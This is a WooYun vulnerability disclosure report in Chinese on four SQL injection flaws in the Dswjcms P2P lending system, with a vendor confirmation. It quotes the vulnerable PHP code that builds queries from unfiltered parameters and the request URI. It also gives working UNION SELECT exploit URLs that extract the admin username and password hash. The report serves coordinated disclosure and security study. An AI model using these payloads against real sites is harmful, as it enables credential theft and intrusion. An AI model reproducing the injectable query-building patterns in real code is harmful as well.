当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2015-141364

漏洞标题: Dswjcms p2p网贷系统前台4处sql注入

相关厂商: www.tifaweb.com

漏洞作者: 路人甲

提交时间: 2015-10-07 09:15

公开时间: 2016-01-11 15:36

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-11: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-12-02: 细节向核心白帽子及相关领域专家公开
2015-12-12: 细节向普通白帽子公开
2015-12-22: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

注入。官网demo

详细说明:

案例参照 http://**.**.**.**/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095。



-------------------------------------------------------------------------------------

#1



/Lib/Action/Win/IndexAction.class.php

code 区域
public function loanAjax(){
$Borrowing = D('Borrowing');
import('ORG.Util.Page');// 导入分页类
$type=$this->_param('type')==0?'':"type =".($this->_param('type')-1); //借款类型
$state=$this->_param('state')==1?'(state=1 or state=10)':"state =".($this->_param('state')); //借款状态
$classify=$this->_param('classify')==0?'':"way =".($this->_param('classify')-1); //还款方式
$scope=$this->_param('scope')==0?'':"candra =".($this->_param('scope')-1); //借款期限
if($type || $state || $classify || $scope){
$type=$type?$type." and ":'';
$state=$state?$state." and ":'';
$scope=$scope?$scope." and ":'';
$classify=$classify?$classify." and ":'';
$where=$type.$state.$scope.$classify;

}

//$where.='(state=1 or state=10)';
$where.='min>1';
$count = $Borrowing->where($where)->count();
.........





当存在 state type classify scope 时。且state不为1即可直接拼接sql。



exp:

code 区域
Win/Index/loanAjax.html?type=1&state=0) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1



1.png





#2

/Lib/Action/Home/LoanAction.class.php

code 区域
public function loanAjax(){

$Borrowing = D('Borrowing');
import('ORG.Util.Page');// 导入分页类
$type=$this->_param('type')==0?'':"type =".($this->_param('type')-1); //借款类型
$state=$this->_param('state')==0?'(state=1 or state=10)':"state =".($this->_param('state')); //借款状态
$classify=$this->_param('classify')==0?'':"way =".($this->_param('classify')-1); //还款方式
$scope=$this->_param('scope')==0?'':"candra =".($this->_param('scope')-1); //借款期限
if($type || $state || $classify || $scope){
$type=$type?$type." and ":'';
$state=$state?$state." and ":'';
$scope=$scope?$scope." and ":'';
$classify=$classify?$classify." and ":'';
$where=$type.$state.$scope.$classify;

}

//$where.='(state=1 or state=10)';
$where.='min>1';
$count = $Borrowing->where($where)->count()



当存在 state type classify scope 时。且state不为0即可直接拼接sql。



exp:

code 区域
Loan/loanAjax.html?type=1&state=1) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1



1.png





#3

D:/wamp/www/Lib/Action/Home/LoanAction.class.php

code 区域
public function index(){
$Borrowing = D('Borrowing');
import('ORG.Util.Page');// 导入分页类
$where='(state=1 or state=5 or state=7 or state=9)';
if($this->_get('search')){
$where.=" and `title` LIKE '%".$this->_get('search')."%'";
}
$count = $Borrowing->where($where)->count();// 查询满足要求的总记录数
$Page = new Page($count,10);// 实例化分页类 传入总记录数和每页显示的记录数数
$show = $Page->show();// 分页显示输出
$borrow=$this->borrow_unicoms($where,$Page->firstRow.','.$Page->listRows,'`stick` DESC,`time` DESC');
$this->assign('borrow',$borrow);
$this->assign('page',$show);// 赋值分页输出
//标题、关键字、描述
$Site = D("Site");
$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();
$this->assign('si',$site);
$active['loan']='active';
$this->assign('active',$active);
$endjs='
//AJAX分页



$this->_get('search') 接收search参数,然而tp这样接收参数只会对双引号编码,他是单引号包裹的。注入产生、

code 区域
Loan.html?search=%27%29+UNION+SELECT+1%2C2%2C3%2C%28select+concat%28username%2C0x5c%2Cpassword%29+from+ds_admin+limit+1%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%23



1.png





#4

www/Lib/Action/Home/IndexAction.class.php

code 区域
public function index(){
$this->copyright();
$where='state=1 or state=5 or state=7 or state=9';
$borrow=$this->borrow_unicoms($where,'','`stick` DESC,`time` DESC');
$this->assign('borrow',$borrow);
//累计投资金额
$borrowing = M('borrowing');
$accumulate['sum']=$borrowing->where('`state`>1')->sum('money');
//累计预期收益
$money = M('money');
$accumulate['benefit']=$money->sum('`stay_interest`+`make_interest`+`make_reward`');
$this->assign('accumulate',$accumulate);
//新闻中心
$new=$this->someArticle(16,5);
$this->assign('new',$new);
$shuffling = M('shuffling');
$shufflings=$shuffling->field('title,img,url')->order('`order` ASC')->select();
$this->assign('shuff',$shufflings);
$head="<link href='__PUBLIC__/css/jslides.css' rel='stylesheet'>";
$this->assign('head',$head);
//标题、关键字、描述
$Site = D("Site");
$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();





$_SERVER['REQUEST_URI'] 直接获取的,那么直接就注入了- -

漏洞证明:

1.png



修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-08 08:27

厂商回复:

此类问题已经处理,已在官方论坛贴出修复办法,并在新版本中已测试无法执行,感谢楼主的宝贵意见

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-01-11 15:46 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)
    0

    爷爷

登录后才能发表评论,请先 登录